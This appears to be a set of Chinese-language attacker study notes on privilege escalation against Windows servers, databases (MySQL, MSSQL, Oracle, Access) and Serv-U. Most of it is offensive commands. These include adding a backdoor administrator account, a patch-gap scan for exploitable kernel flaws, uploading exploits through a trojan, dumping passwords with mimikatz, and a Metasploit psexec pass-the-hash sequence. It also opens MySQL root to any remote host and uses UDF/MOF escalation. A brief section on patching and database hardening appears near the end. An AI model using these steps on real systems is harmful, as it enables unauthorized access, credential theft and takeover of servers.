Windows提权
忽略第三方软件和数据库
服务器通常不打补丁
cmd无回显不执行命令的原因?怎么处理?
原因:由于cmd被降权或删除
处理:上传一个新的cmd.exe(通过木马)。上传到可读写的目录下(一般网站目录下有iuser权限)
设置路径:setp D:\test\cmd.exe
设置权限:cacls “D:\test” /t /p everyone:f (cacls /?——查询cacls用法)
用到的命令
net user test 111 /add ——添加用户名为test,密码为111
net localgroup administrators test /add ——将用户名为test的用户添加到管理员组
net user test /del ——删除test用户
whoami ——查看用户权限
systeminfo ——查看操作系统,补丁情况
ipconfig——查看当前服务器IP ipconfig /all
net user——查看当前用户情况
netstat ——查看当前网络连接情况
netstat –ano ——查看包含UDP的网络连接情况
/netstat –an | find “ESTABLISHED” —— 只查询连接成功的情况
tasklist ——查看当前进程情况 tasklist /svc
taskkill ——结束进程 taskkill -PID xx (管理员权限)
net start 服务——启动服务
net stop 服务——停止服务(管理员权限)
实战
1、查找哪些漏洞可以利用
systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i “%i”|| @echo %i you can fuck)&del /f /q /a micropoor.txt
2、搜索可提权的漏洞并下载.exe文件(以25927799为例)
https://docs.microsoft.com/zh-cn/security-updates/ ——微软查25927799
https://github.com/SecWiki/windows-kernel-exploits ——GitHub中查MS11-080并下载
3、上传.exe文件至可读写目录(如:debug.exe)
4、运行 debug.exe cmd中查看权限debug.exe whoami
windows提权防范
微软升级打补丁;使用第三方软件如360打补丁。一般打完补丁后需要重新启动
提权后干什么?
取管理员账号密码
读取账号密码的工具:lazagne、mimikatz、getpass
读取账号密码hash值的工具:gethash、pwdump7
怎么直接提取密码? mimikatz为例
privilege::debug ——提升权限
sekurlsa::logonpassWords ——抓取密码
getpass.exe >xx.txt
gethashes.exe >xx.txt
运行padump7.dat文件
hash值怎么解密?
1、在线解密
使用Ophcrack破解系统Hash密码
另一个解密工具 LC5
2、kali MSF解密
>msfconsole
>use exploit/windows/smb/psexec
>show option
>set RHOST 192.168.17.12
>set SMBUser administrator
>set SMBPass 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4——hash值
>exploit 或者run
>shell
数据库提权
先来了解一下怎么才能获取到数据库的账号密码?
配置文件中,如:conn、config、data、sql、common 、inc文件中
安装目录下,如mysql安装目录下的user.MYD文件
使用Bruter工具破解—前提是开启了远程连接
使用脚本文件获取
怎么打开远程连接?
root账户一般只能本地访问,但在开发过程中可能需要打开root的远程访问权限。
登录到mysql中,为root进行远程访问的授权,执行下面的命令:
> GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";
> flush privileges;
第一句中"%"表示任何主机都可以远程登录到该服务器上访问。如果要限制只有某台机器可以访问,将其换成相应的IP即可
第二句表示从mysql数据库的grant表中重新加载权限数据。因为MySQL把权限都放在了cache中,所以在做完更改后需要重新加载。
提权
UDF提权——安装mysql自带UDF
一些人员为了保证一定的安全性会将udf.dll文件删掉
首先通过菜刀将远程连接开启
接着使用如下工具将udf.dll文件导入
然后执行SQL命令—查看帮助
MOF漏洞提权
相关内容:http://blog.sina.com.cn/s/blog_8028ba2f0100rzpt.html
MSSQL
2000版本以下可以使用溢出漏洞
2000版本以后使用工具 SQLTools 工具提权
使用工具想执行dos命令需要对三个文件进行恢复
xplog 70.dll、odsole 70.dll、xpstar.dll
Oracle(一般不禁用远程)
一般与jsp、aspx搭配
jsp搭配 默认给系统权限无需提升权限
aspx搭配 需要进行提权
使用工具 Oracleshell
access
使用MDB提权工具
整体思路
1.通过各种漏洞拿到shell
2.找网站的配置文件(找账号、密码)
3.使用 工具 提权
数据库防御
1、限止数据库远程连接,给数据库帐户设置密码必须>8位以上并数字+字母+特殊符号等。
2、不要给网站配置root或SA权限。必须给每个网站独立分配数据库帐户并限格控制好权限。
3、及时升级数据库补丁。
4、安装Waf进行防御。
5、购买数据库审计设备。
第三方提权
serv-U提权
被攻击机安装了serv-U
1 serv-U的密码保存在servUDaemon.exe文件中,使用工具C32asm将文件拖入即可获取到密码
2 serv-U的密码保存在servUDaemon.ini配置文件中,密码规则随机liangweishu两位数+MD5
其他第三方之后补充